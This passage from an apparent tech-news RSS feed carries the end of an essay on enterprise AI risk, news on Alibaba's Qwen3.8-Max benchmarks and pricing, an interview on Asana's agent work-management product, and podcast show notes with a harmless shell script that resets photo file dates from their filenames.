<p class="wp-block-paragraph">The enterprise AI nightmare is not a killer robot; it’s the erosion of our ability to see and control what’s running in our own environments at the exact moment our velocity is exploding. The danger is in ceding your agency. It’s in shipping applications that internal and external customers love—and don’t want to give up—but inherently aren’t safe. Right now, someone in your organization is using AI to build a capable app, pulling in who knows what from who knows where and adding it to your infrastructure.</p>



<p class="wp-block-paragraph">The good news is that these problems are identifiable. They are also solvable, although it will take a new form of thinking than what solved problems in the past. You must think statistically, and declare constitutions with first principles. You can standardize trusted stacks and registries. You can retrain people around architectural security rather than just “secure coding.” You can start treating agent harnesses as systems that deserve design reviews and edits.</p>



<p class="wp-block-paragraph">But, none of that can happen until the enterprise is willing to admit that the nightmare is already here.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Qwen3.8-Max arrives with a bold claim: it outperforms GPT-5.6 Sol Max and Fable 5 on agentic computer use]]></title>
<description><![CDATA[Chinese e-commerce and cloud giant Alibaba's famed Qwen team of AI researchers last night unveiled Qwen3.8-Max, a new flagship 2.4-trillion-parameter mixture-of-experts (MoE) multimodal large language model (LLM) that targets one of the most competitive corners of the frontier AI market: autonomo...]]></description>
<link>https://tsecurity.de/de/3702026/it-nachrichten/qwen38-max-arrives-with-a-bold-claim-it-outperforms-gpt-56-sol-max-and-fable-5-on-agentic-computer-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702026/it-nachrichten/qwen38-max-arrives-with-a-bold-claim-it-outperforms-gpt-56-sol-max-and-fable-5-on-agentic-computer-use/</guid>
<pubDate>Tue, 04 Aug 2026 02:29:58 +0200</pubDate>
<content:encoded><![CDATA[<p>Chinese e-commerce and cloud giant Alibaba's famed Qwen team of AI researchers last night <a href="https://x.com/Alibaba_Qwen/status/2084100707423289643">unveiled Qwen3.8-Max</a>, a new flagship 2.4-trillion-parameter mixture-of-experts (MoE) multimodal large language model (LLM) that targets one of the most competitive corners of the frontier AI market: autonomous software engineering and long-horizon enterprise work. </p><p>If the company's published benchmarks hold up under broader independent testing, Qwen3.8-Max doesn't merely compete with today's leading proprietary models — it surpasses several of them on some key benchmarks in agentic computing.</p><p>Most notably, Qwen reports that Qwen3.8-Max scores 86.1 on the <a href="https://llm-stats.com/benchmarks/osworld-verified">OSWorld-Verified</a> benchmark measuring how well  ahead of GPT-5.6 Sol Max (83.2) and Fable 5 (85.0), while also posting the highest reported score on PaperBench and leading or remaining highly competitive across software engineering, research reproduction, multimodal reasoning, and visual web development benchmarks.</p><p>The release also signals a potentially significant strategic shift for Alibaba: the company says open weights for Qwen3.8-Max will be released next week, alongside Qwen3.8-27B. </p><p>If that happens under a permissive license, it would represent the first time a Max-class Qwen model becomes available for self-hosted deployment—a move that could substantially reshape enterprise adoption. </p><p>One important caveat remains, however: Alibaba has not yet disclosed the licensing terms, leaving open the possibility that the release could use a more restrictive custom license, as we saw recently with <a href="https://venturebeat.com/technology/kimi-k3s-full-weights-are-here-but-theyre-open-with-a-caveat-what-enterprises-should-know">Chinese rival Moonshot's open Kimi K3 frontier model</a>, rather than a broadly permissive one such as Apache 2.0.</p><h2><b>A different definition of 'frontier'</b></h2><p>Over the past year, the competitive landscape for foundation models has become increasingly specialized.</p><p>OpenAI has largely focused its GPT series on general reasoning, multimodal interaction and enterprise productivity.</p><p>Anthropic's Claude series has emphasized coding and dependable long-context reasoning. Google continues to push Gemini toward multimodal productivity and web-native workflows. </p><p>Moonshot AI's Kimi K3 recently entered the conversation by pairing frontier-class performance with an open-weight release.</p><p>Qwen3.8-Max attempts to combine many of these strengths into a single model aimed squarely at enterprise automation.</p><p>Rather than emphasizing conversational intelligence, Alibaba is positioning the model as an autonomous coworker capable of executing projects that span days rather than minutes. </p><p>According to the company, Qwen3.8-Max can autonomously complete software projects lasting more than 10 days, reproduce research papers involving thousands of lines of code, perform iterative chip-design optimization, and continuously revise plans using multimodal feedback loops.</p><p>Those demonstrations remain company-produced and have not yet been broadly replicated by independent evaluators. Nevertheless, they illustrate a growing industry trend: frontier models are increasingly competing on their ability to finish entire workflows rather than answer individual prompts.</p><h2><b>Benchmarks increasingly reward autonomous execution</b></h2><p>The benchmark suite released alongside Qwen3.8-Max reflects this shift.</p><p>Instead of focusing solely on traditional reasoning exams or coding puzzles, many of the highlighted evaluations measure long-horizon execution.</p><p>On OSWorld-Verified, which evaluates computer-use agents interacting with desktop environments, Qwen3.8-Max posts 86.1, ahead of GPT-5.6 Sol Max's 83.2, Fable 5's 85.0, and Gemini 3.1 Pro's 76.2.</p><p>The model also leads:</p><ul><li><p>PaperBench: 93.0</p></li><li><p>TerminalBench 2.1: 86.6</p></li><li><p>Vision2Web: 69.0</p></li><li><p>LVBench: 81.8</p></li><li><p>ERQA: 77.8</p></li></ul><p>Elsewhere, it remains competitive with proprietary leaders while trailing in several categories. </p><p>On the professional software engineering benchmark SWE-Pro, for example, OpenAI's model posts the highest reported score, while Opus 4.8 continues to lead on certain software engineering evaluations and Agents' Last Exam. </p><p>Rather than dominating every benchmark, Qwen appears to offer one of the broadest balanced performance profiles currently available.</p><p>That balance may ultimately matter more for enterprise buyers than isolated benchmark wins.</p><p>Many organizations increasingly evaluate models based on how reliably they complete heterogeneous workflows—writing code, reading documents, navigating interfaces, generating reports, inspecting images and coordinating multiple subtasks—rather than optimizing for one narrow capability.</p><h2><b>Where Qwen3.8-Max appears strongest</b></h2><p>Assuming Alibaba's published results translate into production deployments, several enterprise workloads stand out as particularly well suited for Qwen3.8-Max.</p><p><b>1. Long-running software engineering</b></p><p>Alibaba's primary demonstration involves autonomous software development extending beyond ten days.</p><p>While enterprises should treat these demonstrations as vendor claims until independently reproduced, they align with a growing interest in persistent coding agents that operate continuously rather than interactively.</p><p>Organizations experimenting with autonomous engineering teams, CI/CD automation, repository maintenance, regression testing or feature implementation may find Qwen particularly attractive if its agentic performance proves consistent outside laboratory settings.</p><p><b>2. Computer-use agents</b></p><p>The strongest differentiator may be computer use.</p><p>OSWorld has rapidly become one of the industry's most closely watched benchmarks because it measures a model's ability to interact with operating systems instead of simply generating text.</p><p>Models capable of reliably navigating desktop software can automate countless repetitive business processes, including document processing, enterprise software integration, internal operations and legacy workflows where APIs may not exist.</p><p>Leading OSWorld could therefore translate into real operational advantages if benchmark performance generalizes to production environments.</p><p><b>3. Research automation</b></p><p>Qwen's PaperBench leadership suggests strong potential for organizations performing scientific computing, literature review, experiment reproduction and technical analysis.</p><p>Research institutions, pharmaceutical companies and industrial R&amp;D teams increasingly use LLMs not only for summarization but also for executing reproducible computational workflows. Models capable of maintaining context across extended sessions become increasingly valuable in these environments.</p><p><b>4. Multimodal industrial workflows</b></p><p>Unlike earlier multimodal systems that primarily analyze uploaded images, Qwen describes vision as an ongoing feedback mechanism integrated into planning and execution.</p><p>That architecture could prove particularly useful in manufacturing, logistics, engineering inspection and design review, where visual inputs continuously inform operational decisions rather than serving as isolated prompts.</p><h2><b>The economics may prove just as important</b></h2><p>Perhaps the biggest competitive pressure comes not from benchmark scores but from pricing through Qwen's application programming interface (API) on <a href="https://www.qwencloud.com/models/qwen3.8-max">QwenCloud</a> (based in China):</p><p>Qwen3.8-Max launches at $2/$6 per million input/output tokens, a mid-priced model but undercutting the top U.S. proprietary offerings to which it is benchmarked against by meaningful percentages, less than 1/3 the combined in/out price of Claude Opus 5 and less than 1/4 the price of GPT-5.6 Sol Max. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$0.20</p></td><td><p>$1.20</p></td><td><p>$1.40</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Gemini 3.5 Flash-Lite</p></td><td><p>$0.30</p></td><td><p>$2.50</p></td><td><p>$2.80</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.5</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://docs.x.ai/developers/models">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Qwen3.8-Max</b></p></td><td><p><b>$2.00</b></p></td><td><p><b>$6.00</b></p></td><td><p><b>$8.00</b></p></td><td><p><b></b><a href="https://www.qwencloud.com/models/qwen3.8-max"><b>QwenCloud</b></a></p></td></tr><tr><td><p>Gemini 3.6 Flash</p></td><td><p>$1.50</p></td><td><p>$7.50</p></td><td><p>$9.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Kimi K3</p></td><td><p>$3.00</p></td><td><p>$15.00</p></td><td><p>$18.00</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k3">Moonshot AI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 5</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Standard mode</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Fast mode</p></td><td><p>$10.00</p></td><td><p>$60.00</p></td><td><p>$70.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr></tbody></table><p>Lower inference costs increasingly matter because agentic systems consume dramatically more tokens than conventional chatbots — a reality that likely factored into OpenAI's decision late last week to <a href="https://venturebeat.com/article-pv/ai-price-wars-openai-cuts-gpt-5-6-luna-prices-by-80-as-model-competition-shifts-toward-cost">cut the API prices of its mid- and lower-end GPT-5.6 lineup of models</a> (Terra and Luna) by 20% and 80%, respectively. </p><p>Indeed, as those running these systems can attest, multi-hour autonomous workflows, iterative planning and continuous self-correction can generate millions of tokens during a single task.</p><p>For enterprises deploying hundreds or thousands of agents simultaneously, inference costs often become one of the largest operational expenses. Small reductions in per-token pricing therefore compound rapidly.</p><h2><b>How it compares with American frontier models</b></h2><p>Despite headline benchmark comparisons, Qwen3.8-Max should not necessarily be viewed as a wholesale replacement for leading American models.</p><p>Instead, its strengths suggest different deployment strategies.</p><p>OpenAI's GPT family continues to excel as a broadly capable enterprise reasoning platform with mature tooling, ecosystem integration and extensive commercial deployment. Organizations already invested in Microsoft ecosystems or OpenAI's enterprise offerings may continue to value those operational advantages even if Qwen leads on selected agent benchmarks.</p><p>Anthropic's Claude Opus remains widely regarded as one of the strongest coding assistants, particularly for careful software engineering and long-context reasoning. Some enterprises may still prefer Claude for human-in-the-loop development where reliability and predictable behavior outweigh raw autonomy.</p><p>Google Gemini continues to differentiate itself through deep Workspace integration, multimodal capabilities and Google Cloud services, making it attractive for organizations already standardized on Google's enterprise stack.</p><p>Where Qwen appears most compelling is for enterprises prioritizing autonomous execution, extended planning horizons and favorable inference economics without sacrificing frontier-level performance.</p><h2><b>The open-weight question remains unanswered</b></h2><p>The largest unknown surrounding Qwen3.8-Max has little to do with benchmarks.</p><p>Alibaba says open weights are coming next week. However, neither the announcement nor the provided documentation specifies the license that will govern those weights.</p><p>That distinction could prove critical.</p><p>A permissive license such as Apache 2.0 would significantly broaden enterprise adoption by allowing organizations to self-host, fine-tune and integrate the model into proprietary products with relatively few restrictions.</p><p>A custom license—similar to approaches used by several recent frontier releases—could impose limitations on commercial deployment, redistribution, field of use or model modification. Such restrictions would narrow the appeal for enterprises seeking long-term infrastructure investments, regardless of the model's technical performance.</p><p>Moonshot AI's recent Kimi K3 release illustrates why this distinction matters. While Kimi K3 made its weights openly available to all, its<a href="https://venturebeat.com/technology/kimi-k3s-full-weights-are-here-but-theyre-open-with-a-caveat-what-enterprises-should-know"> licensing terms included specific terms</a> including a disclosure and a commercial license requirement for those offering it as a "Model as a Service." </p><p>Until Alibaba publishes Qwen3.8-Max's license, organizations considering self-hosting should treat the open-weight announcement as promising but incomplete.</p><h2><b>An increasingly crowded frontier</b></h2><p>Qwen3.8-Max arrives during one of the fastest-moving periods in the history of foundation models.</p><p>Within weeks, developers have seen major releases from Moonshot AI, OpenAI, Anthropic and others, each emphasizing different strengths: reasoning, coding, multimodality, autonomous agents or economics.</p><p>Alibaba's contribution is notable because it combines competitive benchmark performance, aggressive pricing, a million-token context window and a stated commitment to releasing weights for its flagship model.</p><p>Whether it becomes the preferred platform for enterprise autonomous agents will ultimately depend less on leaderboard positions than on broader independent validation, production reliability and the licensing terms accompanying the forthcoming weight release. </p><p>Those factors—not benchmark charts alone—will determine whether Qwen3.8-Max becomes a genuine alternative to the leading American proprietary models or simply another impressive entrant in an increasingly crowded frontier AI race.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Asana's AI agents share memory across your company — but not your secrets]]></title>
<description><![CDATA[Enterprise teams building AI agents keep hitting the same wall: a chatbot that can answer a prompt but can't remember what the last five people asked it, and can't tell you whether last month's version actually worked.In a fireside chat with VentureBeat's Sam Witteveen at VB Transform 2026, Asana...]]></description>
<link>https://tsecurity.de/de/3702027/it-nachrichten/asanas-ai-agents-share-memory-across-your-company-but-not-your-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702027/it-nachrichten/asanas-ai-agents-share-memory-across-your-company-but-not-your-secrets/</guid>
<pubDate>Tue, 04 Aug 2026 02:29:58 +0200</pubDate>
<content:encoded><![CDATA[<p>Enterprise teams building AI agents keep hitting the same wall: a chatbot that can answer a prompt but can't remember what the last five people asked it, and can't tell you whether last month's version actually worked.</p><p>In a fireside chat with VentureBeat's Sam Witteveen at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>, Asana's chief product officer, Arnab Bose, unpacked how his team tackled this problem to build a new operating system: Agentic Work Management (AWM). The product treats AI agents as coachable teammates that operate alongside humans rather than as one-to-one assistants.</p><p>For product builders and developers trying to move beyond basic integrations, Bose provided a look under the hood. He detailed how Asana engineered AWM, offering a blueprint for solving real-world bottlenecks and building agentic systems at scale.</p><div></div><h2>The Work Graph: 18 years of company data, repurposed</h2><p>To build an operating system for human-agent teams, Asana needed a ready-made enterprise context graph. They built AWM on top of their 18-year-old architecture: the Work Graph. </p><p>This graph-based database organizes information through a structure the company calls the Pyramid of Clarity. The smallest unit of work is a task with an assignee and a due date. Tasks belong to projects, projects roll up into portfolios, and portfolios connect to company-wide goals. The graph can help trace for example how a delayed design task impacts a corporate revenue goal. The Work Graph provides a real-time ledger of who does what, by when, and why. </p><p>AWM leverages this architecture to create a multiplayer teammate. A standard AI copilot is stateless and tied to a single user's prompt. Because AWM plugs into the Work Graph, the AI can view overarching company goals, update project statuses, and share memory with human colleagues. </p><p>"Because [the agent] is plugged into the Work Graph, it's not just looking at a particular prompt that you're sending it or looking at a particular individual's markdown file system on their local file,” Bose said. “It's working off of that shared ledger for the whole company."</p><p>AWM is already in production. Bose said Asana has "several customers live and successful on it," including FedEx, which published its own case study on the shift.</p><h2>Building in guardrails for confidential work</h2><p>Shipping AWM to enterprise customers required Asana to solve several technical hurdles. The first was data governance. If an AI teammate acts across a company, it builds a shared memory by learning from workflows and human feedback. </p><p>Bose highlighted a critical boundary problem: If an executive uses AWM to build workflows for a confidential project, the system must ensure the agent's updated memory does not leak context to an unauthorized employee who interacts with the same agent later. </p><p>"[I] shouldn't be able to leverage that shared memory when I run the AI teammate if you created that memory using that same teammate on a project that is, let's say, a secret M&amp;A project that I don't have access to," Bose said. Asana engineered a system of access controls to govern what triggers the creation of a memory versus the simple execution of a task.</p><p>Second, AWM handles dynamic model routing to abstract prompt engineering away from the user. When a user assigns a task to an AI teammate (i.e., drafting a job description for a general manager role), the AI cross-references public job postings, Asana’s internal style guide, and product requirement documents. For a complex task, the system automatically routes the prompt to a heavy frontier model — Bose pointed to Anthropic's Opus and OpenAI's models as examples — while lighter tasks get down-leveled to something faster and cheaper. </p><p>"We don't want the knowledge worker to have to think through what the best possible prompt, context engineering, and attachments are that they should put into the task," Bose said. "It should feel as if you were assigning the task to a human being."</p><p>This dynamic routing introduces a third challenge: billing abstraction. Agentic tasks vary in computational complexity, making credit burn rates unpredictable. </p><p>"We don't want to get into a state where our customers are having to reason about the fact that some of these tasks... are way more complex than others and they'll be burning credits at different rates," Bose said, adding that unpredictable pricing risked customers throttling their own employees by capping how often they could run an AI teammate.</p><p>To make AWM commercially viable, Asana designed its billing architecture to charge a static cost per task completion. The platform absorbs the complexity of model selection, token counts, and run limits to ensure predictable enterprise pricing.</p><h2>The problem with stateless chatbots</h2><p>AWM targets a specific problem with current enterprise AI deployments: statelessness. Developers can easily connect large language models to enterprise tools like Slack, Google Drive, or Databricks using Model Context Protocol (MCP) integrations. However, basic chat-based agents lack persistence.</p><p>Bose detailed a scenario where a user asks a chat agent to draft a marketing campaign based on historical performance and competitive research. The agent fetches data from external tools to answer the prompt, but the execution happens in a vacuum. It is a one-off task that benefits a single individual. It fails to create a reusable workflow for the next person building a similar campaign.</p><p>"The challenge with that is that those calls are stateless, and they are not leveraging a shared company brain that is this graph-based database or a context graph," Bose said. </p><p>AWM solves this by creating a permanent state. When an AI teammate inside AWM completes a task, the system records the metadata. It registers whether the completion improved the project status and how it moved higher-level company goals. </p><h2>Inside CoreWeave's product launches</h2><p>Cloud provider CoreWeave is an early adopter using AWM to overhaul complex new product launches. </p><p>"CoreWeave is using both our deterministic AI studio workflow rules as well as multiple AI teammates to do new product launches," Bose shared. </p><p>In the past, CoreWeave product managers filled out complicated forms detailing infrastructure, parameters, and costs. Human reviewers manually evaluated these forms and broke them out into specific tasks for finance, marketing, and hardware teams. </p><p>Under the AWM workflow, a product manager writes a standard Google document pointing to their product requirement documents. A deterministic AI workflow reads the document, automatically creates the project structure, and assigns tasks. Specialized agents then take over the execution. One agent then watches overall project status and flags bottlenecks; another, working inside individual tasks, forecasts infrastructure costs and recommends approvals when the numbers align with historical budgets. The system automatically triages the busywork while human beings focus on evaluating the AI's outputs.</p><h2>The frenemy problem</h2><p>The dynamic gets complicated by the fact that the same frontier-model providers powering AWM under the hood — Anthropic, OpenAI — are also shipping their own competing agent products, like Anthropic's Claude in Slack (Tag). Pressed on the overlap, Bose didn't dispute the tension.</p><p>"<!-- -->I think that's the reality that we all have to live in," he said.</p><p>His case for AWM's staying power rests on Asana's 18 years of user-experience and workflow data, and prebuilt standard operating procedures for specific industries — expertise he argues raw frontier models don't have. A product like Tag can work well in Slack, he said, but it requires a highly curated channel and its own separate credentials for every downstream app it touches.</p><p>"There's a big difference between the power of the model plus a lightweight way to demonstrate its value, and something that's pre-built … for true end-to-end use," Bose said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4697: Correcting the Dates of Files]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


I recently had an experience where UNIX tools proved very useful. A relative had an old mobile phone running Android that stopped connecting to the carrier's network and bought a new one to replace it. I took on the job of trying to copy their fi...]]></description>
<link>https://tsecurity.de/de/3701999/podcasts/hpr4697-correcting-the-dates-of-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701999/podcasts/hpr4697-correcting-the-dates-of-files/</guid>
<pubDate>Tue, 04 Aug 2026 02:27:02 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
I recently had an experience where UNIX tools proved very useful. A relative had an old mobile phone running Android that stopped connecting to the carrier's network and bought a new one to replace it. I took on the job of trying to copy their files (consisting of just photos and videos) off of the old phone.</p>

<p>
Google's software was desperate to convince me to upload everything to the cloud, but I wasn't interested. It offered the option of copying the files over to an SD card, but failed on repeated attempts to do that. The option I tried next was to transfer them to another device via Bluetooth—that one did actually work, although it was slow and would only handle sending about 100 files at a time.</p>

<p>
They came over to my laptop OK, but the problem with that method was that all of the file times were set to the time when they were transferred. I'm not super familiar with how mobile apps manage metadata, but would presume that they look to file times for organizing photos by date. Fortunately, the <em>
names</em>
 of each of the files included the date and time they were created. I recognized that I could write a bit of shell script to parse the filenames and set the file times accordingly.</p>

<p>
While there were over 800 files, the good news is that there were only three different categories of filenames, so the logic to extract the information needed was relatively simple. Each file had eight numerical digits representing the date and six digits representing the time. It would definitely be an option to come up with a more sophisticated parser that could handle a wide variety of filenames, but I went the lazy way and just handled those three cases. Another nice aspect was that none of the filenames contained spaces, which allowed me to be a bit less careful when using them in command lines. I didn't need to worry about time zones because my laptop was set to the same time zone as the phone—also, if a time was off a by a few hours it wouldn't make a practical difference.</p>

<p>

<em>
Examples of the three different types of filenames I had to deal with, labeled with the relevant values: YYYY=year, MM=month, DD=day, hh=hour, mm=minute, and SS=second.</em>

</p>

<pre data-language="plain">
00001IMG_00001_BURST20250525140124.jpg
                    YYYYMMDDhhmmSS

IMG_20220223_124023.jpg
VID_20221017_095024.mp4
    YYYYMMDD hhmmSS

20191224_195939.jpg
20161021_122620-1.jpg
20191130_134317_Burst01.jpg
20200129_223612_010.jpg
YYYYMMDD hhmmSS
</pre>

<p>
I considered <code>
awk</code>
 as an option (see <a href="https://hackerpublicradio.org/eps/hpr4657/index.html#comment_4766" rel="noopener noreferrer" target="_blank">
Whiskeyjack's comment on HPR episode 4657</a>
), but realized it has no built-in way to change file times, so I set it aside. Don't worry, I <em>
will</em>
 come back to that later.</p>

<p>
My approach was to use an <code>
if-then</code>
 shell construct to choose how to treat the three categories of filenames. For the <code>
if</code>
 condition, I fed the filename into the <code>
grep -q</code>
 command with an appropriate regular expression to test whether it matches. The <code>
-q</code>
 option to <code>
grep</code>
 causes it not to output anything—it returns a zero exit status if there's a match and a status greater than zero if there isn't. Then, there is an <code>
elif</code>
 statement with another <code>
grep -q</code>
 test for the second category of filenames. Finally, an <code>
else</code>
 statement is followed by the command to run for all other filenames. The whole thing is wrapped in a <code>
for</code>
 loop that runs over all the files in the current directory.</p>

<p>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/touch.html" rel="noopener noreferrer" target="_blank">
The </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/touch.html" rel="noopener noreferrer" target="_blank">
touch</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/touch.html" rel="noopener noreferrer" target="_blank">
 command</a>
, when used with the <code>
-t</code>
 option, can be given a string consisting of the year, month, day, hour, minute, and second. These are all numerals that are run together, <em>
except</em>
 that a period sits between the minute and second. So we need a way to extract these numbers and to insert the period.</p>

<p>
That's where <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/cut.html" rel="noopener noreferrer" target="_blank">
the </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/cut.html" rel="noopener noreferrer" target="_blank">
cut</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/cut.html" rel="noopener noreferrer" target="_blank">
 utility</a>
 comes in. It can be given a set of characters to select, and I specified a different set representing the appropriate ones depending on which category a filename fit into. To insert the period, I used <code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sed.html" rel="noopener noreferrer" target="_blank">
sed</a>

</code>
 to replace the last two characters with a period followed by those characters.</p>

<p>

<em>
The first script was to test out that I was getting the correct results.</em>

</p>

<pre data-language="plain">
for fn in *
do
  if echo "$fn" | grep -q BURST
  then
    printf "$fn "
    echo $fn | cut -c '21-34' | sed 's/..$/.&amp;/'
  elif echo "$fn" | grep -q -E '^(IMG_|VID_)'
  then
    printf "$fn "
    echo $fn | cut -c '5-12,14-19' | sed 's/..$/.&amp;/'
  else
    printf "$fn "
    echo $fn | cut -c '1-8,10-15' | sed 's/..$/.&amp;/'
  fi
done
</pre>

<p>

<em>
This one actually sets the file times. The </em>

<code>

<em>
-c</em>

</code>

<em>
 option to </em>

<code>

<em>
touch</em>

</code>

<em>
 prevents it from creating a file if one with that name doesn't already exist.</em>

</p>

<pre data-language="plain">
for fn in *
do
  if echo "$fn" | grep -q BURST
  then
    touch -c -t "$(echo $fn | cut -c '21-34' | sed 's/..$/.&amp;/')" "$fn"
  elif echo "$fn" | grep -q -E '^(IMG_|VID_)'
  then
    touch -c -t "$(echo $fn | cut -c '5-12,14-19' | sed 's/..$/.&amp;/')" "$fn"
  else
    touch -c -t "$(echo $fn | cut -c '1-8,10-15' | sed 's/..$/.&amp;/')" "$fn"
  fi
done
</pre>

<p>
